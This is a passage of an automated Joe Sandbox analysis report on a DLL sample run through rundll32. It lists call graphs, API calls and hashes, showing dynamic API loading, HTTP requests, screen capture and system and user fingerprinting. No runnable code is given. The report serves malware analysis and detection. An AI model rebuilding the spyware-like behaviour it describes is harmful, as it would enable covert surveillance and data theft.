8225 7ffe1150204b 8223->8225 8226 7ffe11502088 8223->8226 8229 7ffe11502017 LoadLibraryW 8224->8229 8230 7ffe11507c50 10 API calls 8225->8230 8227 7ffe11502092 8226->8227 8228 7ffe115020cf 8226->8228 8231 7ffe11507c50 10 API calls 8227->8231 8232 7ffe115020d9 8228->8232 8233 7ffe11502116 8228->8233 8234 7ffe11507e50 2 API calls 8229->8234 8235 7ffe11502057 GetProcAddress 8230->8235 8237 7ffe1150209e GetProcAddress 8231->8237 8238 7ffe11507c50 10 API calls 8232->8238 8239 7ffe1150215d 8233->8239 8240 7ffe11502120 8233->8240 8234->8223 8236 7ffe11507e50 2 API calls 8235->8236 8236->8226 8243 7ffe11507e50 2 API calls 8237->8243 8244 7ffe115020e5 GetProcAddress 8238->8244 8241 7ffe11502167 8239->8241 8242 7ffe115021a4 8239->8242 8245 7ffe11507c50 10 API calls 8240->8245 8246 7ffe11507c50 10 API calls 8241->8246 8247 7ffe115021eb 8242->8247 8248 7ffe115021ae 8242->8248 8243->8228 8249 7ffe11507e50 2 API calls 8244->8249 8250 7ffe1150212c GetProcAddress 8245->8250 8251 7ffe11502173 GetProcAddress 8246->8251 8253 7ffe115021f5 8247->8253 8254 7ffe11502232 8247->8254 8252 7ffe11507c50 10 API calls 8248->8252 8249->8233 8255 7ffe11507e50 2 API calls 8250->8255 8258 7ffe11507e50 2 API calls 8251->8258 8259 7ffe115021ba GetProcAddress 8252->8259 8260 7ffe11507c50 10 API calls 8253->8260 8256 7ffe1150223c 8254->8256 8257 7ffe11502279 InternetOpenW 8254->8257 8255->8239 8261 7ffe11507c50 10 API calls 8256->8261 8262 7ffe115022a8 InternetSetOptionW InternetSetOptionW InternetSetOptionW InternetConnectW 8257->8262 8263 7ffe11502686 8257->8263 8258->8242 8264 7ffe11507e50 2 API calls 8259->8264 8265 7ffe11502201 GetProcAddress 8260->8265 8266 7ffe11502248 GetProcAddress 8261->8266 8267 7ffe1150267b InternetCloseHandle 8262->8267 8268 7ffe11502359 8262->8268 8263->8209 8298 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8263->8298 8264->8247 8269 7ffe11507e50 2 API calls 8265->8269 8270 7ffe11507e50 2 API calls 8266->8270 8267->8263 8271 7ffe115023a5 8268->8271 8272 7ffe1150238f 8268->8272 8269->8254 8270->8257 8274 7ffe11507d50 10 API calls 8271->8274 8273 7ffe11507d50 10 API calls 8272->8273 8275 7ffe1150239b HttpOpenRequestW 8273->8275 8274->8275 8277 7ffe11507e50 2 API calls 8275->8277 8278 7ffe1150242a 8277->8278 8279 7ffe1150266d InternetCloseHandle 8278->8279 8280 7ffe115024d4 SetLastError HttpSendRequestW 8278->8280 8283 7ffe11507d50 10 API calls 8278->8283 8279->8267 8281 7ffe1150250d GetLastError 8280->8281 8282 7ffe1150259b 8280->8282 8284 7ffe1150252b InternetQueryOptionW InternetSetOptionW HttpSendRequestW 8281->8284 8285 7ffe11502521 8281->8285 8481 7ffe11506950 GetProcessHeap RtlAllocateHeap 8282->8481 8288 7ffe11502451 8283->8288 8284->8282 8285->8282 8285->8284 8287 7ffe11502662 InternetCloseHandle 8287->8279 8482 7ffe11506950 GetProcessHeap RtlAllocateHeap 8288->8482 8289 7ffe115025c6 InternetReadFile 8290 7ffe11502634 8289->8290 8291 7ffe115025a5 8289->8291 8292 7ffe1150263b 8290->8292 8484 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8290->8484 8291->8287 8291->8289 8291->8290 8483 7ffe115069b0 GetProcessHeap HeapReAlloc 8291->8483 8292->8287 8296 7ffe11507e50 2 API calls 8296->8280 8297 7ffe11502496 wcscat wcscpy 8297->8296 8298->8209 8299->8206 8301 7ffe115075a4 8300->8301 8302 7ffe115075d1 8300->8302 8303 7ffe11507d50 10 API calls 8301->8303 8304 7ffe115075db 8302->8304 8305 7ffe1150760f 8302->8305 8306 7ffe115075b0 LoadLibraryW 8303->8306 8409 7ffe11507c50 8304->8409 8308 7ffe11507619 8305->8308 8309 7ffe11507646 8305->8309 8310 7ffe11507e50 2 API calls 8306->8310 8312 7ffe11507d50 10 API calls 8308->8312 8313 7ffe11507684 8309->8313 8314 7ffe11507650 8309->8314 8310->8302 8317 7ffe11507625 LoadLibraryW 8312->8317 8315 7ffe115076bb 8313->8315 8400 7ffe11507d50 8313->8400 8318 7ffe11507c50 10 API calls 8314->8318 8321 7ffe115076f9 8315->8321 8322 7ffe115076c5 8315->8322 8316 7ffe11507e50 2 API calls 8316->8305 8323 7ffe11507e50 2 API calls 8317->8323 8319 7ffe1150765c GetProcAddress 8318->8319 8324 7ffe11507e50 2 API calls 8319->8324 8327 7ffe11507737 8321->8327 8328 7ffe11507703 8321->8328 8326 7ffe11507c50 10 API calls 8322->8326 8323->8309 8324->8313 8332 7ffe115076d1 GetProcAddress 8326->8332 8329 7ffe11507775 8327->8329 8330 7ffe11507741 8327->8330 8333 7ffe11507c50 10 API calls 8328->8333 8335 7ffe115077bc 8329->8335 8336 7ffe1150777f 8329->8336 8334 7ffe11507c50 10 API calls 8330->8334 8337 7ffe11507e50 2 API calls 8332->8337 8338 7ffe1150770f GetProcAddress 8333->8338 8340 7ffe1150774d GetProcAddress 8334->8340 8342 7ffe115077c6 8335->8342 8343 7ffe11507803 8335->8343 8341 7ffe11507c50 10 API calls 8336->8341 8337->8321 8339 7ffe11507e50 2 API calls 8338->8339 8339->8327 8346 7ffe11507e50 2 API calls 8340->8346 8347 7ffe1150778b GetProcAddress 8341->8347 8348 7ffe11507c50 10 API calls 8342->8348 8344 7ffe1150780d 8343->8344 8345 7ffe1150784a 8343->8345 8349 7ffe11507c50 10 API calls 8344->8349 8350 7ffe11507854 8345->8350 8351 7ffe11507891 8345->8351 8346->8329 8352 7ffe11507e50 2 API calls 8347->8352 8353 7ffe115077d2 GetProcAddress 8348->8353 8354 7ffe11507819 GetProcAddress 8349->8354 8355 7ffe11507c50 10 API calls 8350->8355 8356 7ffe1150789b 8351->8356 8357 7ffe115078d1 8351->8357 8352->8335 8358 7ffe11507e50 2 API calls 8353->8358 8361 7ffe11507e50 2 API calls 8354->8361 8362 7ffe11507860 GetProcAddress 8355->8362 8363 7ffe11507d50 10 API calls 8356->8363 8359 7ffe115078db 8357->8359 8360 7ffe11507918 8357->8360 8358->8343 8364 7ffe11507c50 10 API calls 8359->8364 8365 7ffe11507922 SetProcessDPIAware 8360->8365 8374 7ffe11507928 8360->8374 8361->8345 8366 7ffe11507e50 2 API calls 8362->8366 8367 7ffe115078a7 LoadLibraryW 8363->8367 8368 7ffe115078e7 GetProcAddress 8364->8368 8365->8374 8366->8351 8369 7ffe11507e50 2 API calls 8367->8369 8370 7ffe11507e50 2 API calls 8368->8370 8369->8357 8370->8360 8371 7ffe11507b5b 8372 7ffe11509540 _handle_error 8 API calls 8371->8372 8373 7ffe115038df 8372->8373 8373->8215 8389 7ffe11506950 GetProcessHeap RtlAllocateHeap 8373->8389 8374->8371 8414 7ffe11506950 GetProcessHeap RtlAllocateHeap 8374->8414 8376 7ffe11507999 8376->8371 8377 7ffe11507b51 8376->8377 8415 7ffe11507b90 8376->8415 8472 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8377->8472 8381 7ffe115079e3 8420 7ffe115070a0 8381->8420 8383 7ffe11507b43 DeleteObject 8383->8377 8386 7ffe11507aba 8387 7ffe11507af0 8386->8387 8471 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8386->8471 8387->8383 8389->8220 8390->8215 8392 7ffe1150954a 8391->8392 8393 7ffe11503a5c 8392->8393 8394 7ffe11509598 IsProcessorFeaturePresent 8392->8394 8393->8206 8393->8221 8395 7ffe115095af 8394->8395 8476 7ffe1150978c RtlCaptureContext 8395->8476 8473 7ffe11506950 GetProcessHeap RtlAllocateHeap 8400->8473 8402 7ffe11509540 _handle_error 8 API calls 8403 7ffe1150769a LoadLibraryW 8402->8403 8405 7ffe11507e50 8403->8405 8404 7ffe11507db5 8404->8402 8406 7ffe11507e93 8405->8406 8407 7ffe11507e61 memcpy_s 8405->8407 8406->8315 8474 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8407->8474 8475 7ffe11506950 GetProcessHeap RtlAllocateHeap 8409->8475 8411 7ffe11509540 _handle_error 8 API calls 8413 7ffe115075e7 GetProcAddress 8411->8413 8412 7ffe11507cb5 8412->8411 8413->8316 8414->8376 8416 7ffe11507d50 10 API calls 8415->8416 8419 7ffe11507bbf memcpy_s 8416->8419 8417 7ffe11507e50 2 API calls 8418 7ffe115079db 8417->8418 8418->8377 8418->8381 8419->8417 8421 7ffe1150715c 8420->8421 8422 7ffe1150712f 8420->8422 8424 7ffe1150719a 8421->8424 8426 7ffe11507c50 10 API calls 8421->8426 8423 7ffe11507d50 10 API calls 8422->8423 8425 7ffe1150713b LoadLibraryW 8423->8425 8427 7ffe115071e1 8424->8427 8430 7ffe11507c50 10 API calls 8424->8430 8428 7ffe11507e50 2 API calls 8425->8428 8429 7ffe11507172 GetProcAddress 8426->8429 8431 7ffe11507c50 10 API calls 8427->8431 8433 7ffe11507228 8427->8433 8428->8421 8434 7ffe11507e50 2 API calls 8429->8434 8435 7ffe115071b0 GetProcAddress 8430->8435 8436 7ffe115071f7 GetProcAddress 8431->8436 8432 7ffe11507268 8438 7ffe115072af 8432->8438 8442 7ffe11507c50 10 API calls 8432->8442 8433->8432 8437 7ffe11507d50 10 API calls 8433->8437 8434->8424 8439 7ffe11507e50 2 API calls 8435->8439 8440 7ffe11507e50 2 API calls 8436->8440 8441 7ffe1150723e LoadLibraryW 8437->8441 8443 7ffe115072f6 8438->8443 8444 7ffe11507c50 10 API calls 8438->8444 8439->8427 8440->8433 8446 7ffe11507e50 2 API calls 8441->8446 8447 7ffe1150727e GetProcAddress 8442->8447 8445 7ffe1150733d 8443->8445 8449 7ffe11507c50 10 API calls 8443->8449 8448 7ffe115072c5 GetProcAddress 8444->8448 8450 7ffe11507384 8445->8450 8454 7ffe11507c50 10 API calls 8445->8454 8446->8432 8451 7ffe11507e50 2 API calls 8447->8451 8452 7ffe11507e50 2 API calls 8448->8452 8453 7ffe1150730c GetProcAddress 8449->8453 8455 7ffe115073cb GetDC 8450->8455 8460 7ffe11507c50 10 API calls 8450->8460 8451->8438 8452->8443 8458 7ffe11507e50 2 API calls 8453->8458 8459 7ffe11507353 GetProcAddress 8454->8459 8456 7ffe115073e4 CreateCompatibleDC 8455->8456 8457 7ffe115074c1 8455->8457 8462 7ffe115074b4 ReleaseDC 8456->8462 8463 7ffe11507400 GetSystemMetrics GetSystemMetrics CreateCompatibleBitmap 8456->8463 8457->8377 8457->8383 8457->8387 8470 7ffe11506950 GetProcessHeap RtlAllocateHeap 8457->8470 8458->8445 8464 7ffe11507e50 2 API calls 8459->8464 8461 7ffe1150739a GetProcAddress 8460->8461 8465 7ffe11507e50 2 API calls 8461->8465 8462->8457 8466 7ffe1150743c SelectObject BitBlt 8463->8466 8467 7ffe115074a9 DeleteObject 8463->8467 8464->8450 8465->8455 8468 7ffe1150748f 8466->8468 8469 7ffe1150749e DeleteObject 8466->8469 8467->8462 8468->8467 8469->8467 8470->8386 8471->8387 8472->8371 8473->8404 8474->8406 8475->8412 8477 7ffe115097a6 RtlLookupFunctionEntry 8476->8477 8478 7ffe115095c2 8477->8478 8479 7ffe115097bc RtlVirtualUnwind 8477->8479 8480 7ffe11509564 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8478->8480 8479->8477 8479->8478 8481->8291 8482->8297 8483->8291 8484->8287

    Executed Functions

    Function 00007FFE11501F20 Relevance: 51.1, APIs: 27, Strings: 2, Instructions: 313networklibraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 7ffe11501f20-7ffe11502009 1 7ffe1150200b-7ffe1150203c call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 0->1 2 7ffe11502041-7ffe11502049 0->2 1->2 4 7ffe1150204b-7ffe11502083 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 2->4 5 7ffe11502088-7ffe11502090 2->5 4->5 6 7ffe11502092-7ffe115020ca call 7ffe11507c50 GetProcAddress call 7ffe11507e50 5->6 7 7ffe115020cf-7ffe115020d7 5->7 6->7 11 7ffe115020d9-7ffe11502111 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 7->11 12 7ffe11502116-7ffe1150211e 7->12 11->12 18 7ffe1150215d-7ffe11502165 12->18 19 7ffe11502120-7ffe11502158 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 12->19 20 7ffe11502167-7ffe1150219f call 7ffe11507c50 GetProcAddress call 7ffe11507e50 18->20 21 7ffe115021a4-7ffe115021ac 18->21 19->18 20->21 26 7ffe115021eb-7ffe115021f3 21->26 27 7ffe115021ae-7ffe115021e6 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 21->27 32 7ffe115021f5-7ffe1150222d call 7ffe11507c50 GetProcAddress call 7ffe11507e50 26->32 33 7ffe11502232-7ffe1150223a 26->33 27->26 32->33 35 7ffe1150223c-7ffe11502274 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 33->35 36 7ffe11502279-7ffe115022a2 InternetOpenW 33->36 35->36 41 7ffe115022a8-7ffe11502353 InternetSetOptionW * 3 InternetConnectW 36->41 42 7ffe11502686-7ffe11502695 36->42 46 7ffe1150267b-7ffe11502680 InternetCloseHandle 41->46 47 7ffe11502359-7ffe11502369 41->47 46->42 50 7ffe1150236b-7ffe11502373 47->50 51 7ffe11502377-7ffe1150238d 47->51 50->51 52 7ffe115023a5-7ffe115023d0 call 7ffe11507d50 51->52 53 7ffe1150238f-7ffe115023a3 call 7ffe11507d50 51->53 58 7ffe115023d4-7ffe11502430 HttpOpenRequestW call 7ffe11507e50 52->58 53->58 61 7ffe1150266d-7ffe11502675 InternetCloseHandle 58->61 62 7ffe11502436-7ffe1150243f 58->62 61->46 63 7ffe11502445-7ffe115024a1 call 7ffe11507d50 call 7ffe1150ced0 * 2 call 7ffe11506950 62->63 64 7ffe115024d4-7ffe11502507 SetLastError HttpSendRequestW 62->64 89 7ffe115024c7-7ffe115024cf call 7ffe11507e50 63->89 90 7ffe115024a3-7ffe115024c2 call 7ffe1150ceb4 call 7ffe1150ce88 63->90 65 7ffe1150250d-7ffe1150251f GetLastError 64->65 66 7ffe1150259b-7ffe115025b0 call 7ffe11506950 64->66 68 7ffe1150252b-7ffe11502595 InternetQueryOptionW InternetSetOptionW HttpSendRequestW 65->68 69 7ffe11502521-7ffe11502529 65->69 75 7ffe115025b6-7ffe115025be 66->75 76 7ffe11502662-7ffe11502667 InternetCloseHandle 66->76 68->66 69->66 69->68 78 7ffe115025c6-7ffe115025f0 InternetReadFile 75->78 76->61 80 7ffe11502634-7ffe11502639 78->80 81 7ffe115025f2-7ffe115025f7 78->81 82 7ffe1150263b-7ffe11502656 80->82 83 7ffe11502658-7ffe1150265d call 7ffe11506980 80->83 81->80 85 7ffe115025f9-7ffe11502632 call 7ffe115069b0 81->85 82->76 83->76 85->78 89->64 90->89
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Internet$AddressProc$Option$CloseHandleHttpRequest$ErrorHeapLastOpenSend$AllocConnectFileLibraryLoadProcessQueryReadwcscatwcscpy
    • String ID: /$`
    • API String ID: 1971805275-1897241921
    • Opcode ID: 012db6c3d47eaee4c38ac54376f83c31a08236e5e1d12890b1faab2f80012a7a
    • Instruction ID: f50deccc7e2f9ca7a8a4f32e89b7174216c3f884e5f570255c1f2ccd68af08da
    • Opcode Fuzzy Hash: 012db6c3d47eaee4c38ac54376f83c31a08236e5e1d12890b1faab2f80012a7a
    • Instruction Fuzzy Hash: 0412C836908E81C5E760DB56F8543AAB3A8FB847A4F104079DA8D83A79DF7DD488CB41
    Function 00007FFE115074E0 Relevance: 24.3, APIs: 16, Instructions: 286libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 160 7ffe115074e0-7ffe115075a2 161 7ffe115075a4-7ffe115075cc call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 160->161 162 7ffe115075d1-7ffe115075d9 160->162 161->162 164 7ffe115075db-7ffe1150760a call 7ffe11507c50 GetProcAddress call 7ffe11507e50 162->164 165 7ffe1150760f-7ffe11507617 162->165 164->165 168 7ffe11507619-7ffe11507641 call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 165->168 169 7ffe11507646-7ffe1150764e 165->169 168->169 173 7ffe11507684-7ffe1150768c 169->173 174 7ffe11507650-7ffe1150767f call 7ffe11507c50 GetProcAddress call 7ffe11507e50 169->174 175 7ffe115076bb-7ffe115076c3 173->175 176 7ffe1150768e-7ffe115076b6 call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 173->176 174->173 182 7ffe115076f9-7ffe11507701 175->182 183 7ffe115076c5-7ffe115076f4 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 175->183 176->175 188 7ffe11507737-7ffe1150773f 182->188 189 7ffe11507703-7ffe11507732 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 182->189 183->182 190 7ffe11507775-7ffe1150777d 188->190 191 7ffe11507741-7ffe11507770 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 188->191 189->188 196 7ffe115077bc-7ffe115077c4 190->196 197 7ffe1150777f-7ffe115077b7 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 190->197 191->190 203 7ffe115077c6-7ffe115077fe call 7ffe11507c50 GetProcAddress call 7ffe11507e50 196->203 204 7ffe11507803-7ffe1150780b 196->204 197->196 203->204 205 7ffe1150780d-7ffe11507845 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 204->205 206 7ffe1150784a-7ffe11507852 204->206 205->206 211 7ffe11507854-7ffe1150788c call 7ffe11507c50 GetProcAddress call 7ffe11507e50 206->211 212 7ffe11507891-7ffe11507899 206->212 211->212 217 7ffe1150789b-7ffe115078cc call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 212->217 218 7ffe115078d1-7ffe115078d9 212->218 217->218 220 7ffe115078db-7ffe11507913 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 218->220 221 7ffe11507918-7ffe11507920 218->221 220->221 226 7ffe11507928-7ffe11507970 221->226 227 7ffe11507922 SetProcessDPIAware 221->227 234 7ffe11507b69-7ffe11507b88 call 7ffe11509540 226->234 235 7ffe11507976-7ffe11507988 226->235 227->226 239 7ffe11507b5b 235->239 240 7ffe1150798e-7ffe115079a4 call 7ffe11506950 235->240 239->234 240->239 243 7ffe115079aa-7ffe115079bf 240->243 245 7ffe115079c5-7ffe115079dd call 7ffe11507b90 243->245 246 7ffe11507b51-7ffe11507b56 call 7ffe11506980 243->246 245->246 250 7ffe115079e3-7ffe115079f9 call 7ffe115070a0 245->250 246->239 250->246 253 7ffe115079ff-7ffe11507a19 250->253 255 7ffe11507b43-7ffe11507b4b DeleteObject 253->255 256 7ffe11507a1f-7ffe11507a33 253->256 255->246 258 7ffe11507a39-7ffe11507a59 256->258 259 7ffe11507b35 256->259 261 7ffe11507b25-7ffe11507b2d 258->261 262 7ffe11507a5f-7ffe11507ac5 call 7ffe11506950 258->262 259->255 261->259 262->261 267 7ffe11507ac7-7ffe11507aee 262->267 269 7ffe11507b1b-7ffe11507b20 call 7ffe11506980 267->269 270 7ffe11507af0-7ffe11507af9 267->270 269->261 271 7ffe11507b0c-7ffe11507b19 270->271 272 7ffe11507afb-7ffe11507b0a 270->272 271->261 272->271
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$AwareDeleteObjectProcess
    • String ID:
    • API String ID: 96057529-0
    • Opcode ID: 8cfb5bf55d4cd5814cb5932fe69723dd0fdf4b2c5a54e68c6a7713185a63c261
    • Instruction ID: ecffef4a928d7926ff187ac697811ae0017b54c37f1db329e966a3c5866b6ede
    • Opcode Fuzzy Hash: 8cfb5bf55d4cd5814cb5932fe69723dd0fdf4b2c5a54e68c6a7713185a63c261
    • Instruction Fuzzy Hash: BD02DC3291DE86C5EB60EB66E8543AA73A8FB84764F4000B9DA8D43775DF7CE484CB41
    Function 00007FFE115069F0 Relevance: 16.7, APIs: 11, Instructions: 207libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 331 7ffe115069f0-7ffe11506a55 332 7ffe11506a57-7ffe11506a7f call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 331->332 333 7ffe11506a84-7ffe11506a8c 331->333 332->333 335 7ffe11506ac2-7ffe11506aca 333->335 336 7ffe11506a8e-7ffe11506abd call 7ffe11507c50 GetProcAddress call 7ffe11507e50 333->336 339 7ffe11506acc-7ffe11506af4 call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 335->339 340 7ffe11506af9-7ffe11506b01 335->340 336->335 339->340 344 7ffe11506b37-7ffe11506b3f 340->344 345 7ffe11506b03-7ffe11506b32 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 340->345 347 7ffe11506b75-7ffe11506b7d 344->347 348 7ffe11506b41-7ffe11506b70 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 344->348 345->344 353 7ffe11506bac-7ffe11506bb4 347->353 354 7ffe11506b7f-7ffe11506ba7 call 7ffe11507d50 LoadLibraryW call 7ffe11507e50 347->354 348->347 359 7ffe11506bea-7ffe11506c55 call 7ffe1150a8b0 RtlGetVersion 353->359 360 7ffe11506bb6-7ffe11506be5 call 7ffe11507c50 GetProcAddress call 7ffe11507e50 353->360 354->353 369 7ffe11506c6c-7ffe11506c77 GetSystemInfo 359->369 370 7ffe11506c57-7ffe11506c6a GetNativeSystemInfo 359->370 360->359 371 7ffe11506c7f-7ffe11506c8f 369->371 370->371 372 7ffe11506ca8-7ffe11506cb0 371->372 373 7ffe11506c91-7ffe11506c96 371->373 376 7ffe11506cbc-7ffe11506cc4 372->376 377 7ffe11506cb2-7ffe11506cba 372->377 374 7ffe11506c98-7ffe11506c9d 373->374 375 7ffe11506d17-7ffe11506d1f 373->375 380 7ffe11506dc3-7ffe11506dcb 374->380 381 7ffe11506ca3-7ffe11506e05 374->381 378 7ffe11506d42-7ffe11506d4a 375->378 379 7ffe11506d21-7ffe11506d2c 375->379 383 7ffe11506cc6-7ffe11506cce 376->383 384 7ffe11506cd0-7ffe11506cd8 376->384 382 7ffe11506d12 377->382 392 7ffe11506d6d-7ffe11506d75 378->392 393 7ffe11506d4c-7ffe11506d57 378->393 387 7ffe11506d38 379->387 388 7ffe11506d2e-7ffe11506d36 379->388 389 7ffe11506dcd-7ffe11506dd8 380->389 390 7ffe11506e03 380->390 386 7ffe11506e0d-7ffe11506e15 381->386 382->386 383->382 384->382 385 7ffe11506cda-7ffe11506ce5 384->385 394 7ffe11506ce7-7ffe11506cef 385->394 395 7ffe11506cf1-7ffe11506cfe GetSystemMetrics 385->395 398 7ffe11506e17-7ffe11506e1d 386->398 399 7ffe11506e21-7ffe11506e47 call 7ffe11509540 386->399 400 7ffe11506d40 387->400 388->400 401 7ffe11506dfb 389->401 402 7ffe11506dda-7ffe11506de5 389->402 390->386 396 7ffe11506d98-7ffe11506da0 392->396 397 7ffe11506d77-7ffe11506d82 392->397 403 7ffe11506d59-7ffe11506d61 393->403 404 7ffe11506d63 393->404 394->382 407 7ffe11506d0a 395->407 408 7ffe11506d00-7ffe11506d08 395->408 409 7ffe11506da2-7ffe11506dad 396->409 410 7ffe11506dc1 396->410 405 7ffe11506d84-7ffe11506d8c 397->405 406 7ffe11506d8e 397->406 398->399 400->410 401->390 412 7ffe11506de7-7ffe11506def 402->412 413 7ffe11506df1 402->413 414 7ffe11506d6b 403->414 404->414 415 7ffe11506d96 405->415 406->415 407->382 408->382 416 7ffe11506db9 409->416 417 7ffe11506daf-7ffe11506db7 409->417 410->386 419 7ffe11506df9 412->419 413->419 414->410 415->410 416->410 417->410 419->390
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$InfoSystem$NativeVersion
    • String ID:
    • API String ID: 2883576749-0
    • Opcode ID: 0aea97e101c3ff36eaef724201dc58088ff3a9420ab3d2d647de2ff23f6ba47e
    • Instruction ID: 749c7807441b41434cb1e3f0ed16d88ab75d2f8ef9b9d754f3a694a420171061
    • Opcode Fuzzy Hash: 0aea97e101c3ff36eaef724201dc58088ff3a9420ab3d2d647de2ff23f6ba47e
    • Instruction Fuzzy Hash: 95C1FE3290CE86CAE7709B92E45437E77A8FB85724F6001B9E68D466B4CF7CE584CB11
    Function 00007FFE115050D0 Relevance: 12.2, APIs: 8, Instructions: 215COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad$Name$Computer$ByteCharCloseCountHandleInformationMultiMutexOpenSleepTickUserVersionVolumeWide
    • String ID:
    • API String ID: 410980975-0
    • Opcode ID: e9394c26cd00b21dbd57a55b00268abf68e6b74b96935cfacdfebeadd37971f1
    • Instruction ID: e092227030becf1131ea161675d648340c2a2d9b15261d6fa02384365844dfba
    • Opcode Fuzzy Hash: e9394c26cd00b21dbd57a55b00268abf68e6b74b96935cfacdfebeadd37971f1
    • Instruction Fuzzy Hash: C8C1D232618EC186E770DB66E4943AEB3A5FB84754F40417AE68D87AB9DF3CD448CB40
    Function 00007FFE115015B0 Relevance: 12.1, APIs: 8, Instructions: 116libraryloaderfileCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressFindProc$File$CloseFirstLibraryLoadNextswprintf
    • String ID:
    • API String ID: 432991409-0
    • Opcode ID: 71db46e1dc4537d7a33d97d80a5c1f21eb868e22e8d370c5f460187df6bb74ed
